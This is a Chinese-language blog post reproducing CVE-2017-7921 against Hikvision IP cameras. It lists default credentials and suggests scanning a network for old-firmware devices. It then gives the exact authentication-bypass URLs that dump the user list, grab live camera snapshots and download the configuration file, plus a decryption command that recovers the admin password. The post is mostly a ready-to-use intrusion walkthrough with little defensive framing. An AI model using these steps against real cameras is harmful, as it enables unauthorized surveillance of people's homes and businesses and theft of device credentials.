CVE-2017-7921 海康威视 Hikvision 摄像头漏洞复现

0x00 开始之前

可以先尝试使用出厂用户名密码登录

user:admin
pwd:12345

0x10 搜索摄像头后台

先搜索摄像头后台,如果在同一个局域网内可以通过扫描局域网IP的方式搜索。
我使用的是Advanced IP Scanner,扫描之后保存到csv文件中,搜索“Hikvision”可以发现许多IP。

0x20 挑选合适的版本

毕竟这个漏洞已经很古老了,所以只有旧版固件才能用,建议多尝试几个IP,找一个旧点的固件。

0x30 验证漏洞

0x31 检索用户列表

在浏览器中输入以下地址来获取。
http://{IP}/Security/users?auth=YWRtaW46MTEK

请将{IP}替换为摄像头的IP

如果浏览器显示内容如下,说明这个摄像头有漏洞

<UserList xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<User xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<id>1</id>
<userName>admin</userName>
<priority>high</priority>
<ipAddress>0.0.0.0</ipAddress>
<macAddress>00:00:00:00:00:00</macAddress>
<userLevel>Administrator</userLevel>
</User>
</UserList>

0x32 获取监控快照

在没有身份验证的情况下可以通过访问以下地址获取监控快照。
http://{IP}/onvif-http/snapshot?auth=YWRtaW46MTEK

0x33 下载摄像头配置文件

首先访问以下地址下载配置文件。
http://{IP}/System/configurationFile?auth=YWRtaW46MTEK
之后浏览器会自动下载一个名为“configurationFile”的文件

0x34 获取密码

下载这个工具

之后使用以下命令解码配置文件

python3 decrypt_configurationFile.py {configurationFile}
请先使用 pip3 install pycryptodome 下载所需包

接下来你会在输出中看到一大堆文字,但是只需要注意上面获取到的用户名后面跟着的字符串,那就是摄像头的密码。

http://blog.tntinminecraft.tech/index.php/2023/12/09/cve-2017-7921-%e6%b5%b7%e5%ba%b7%e5%a8%81%e8%a7%86-hikvision-%e6%91%84%e5%83%8f%e5%a4%b4%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0/
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇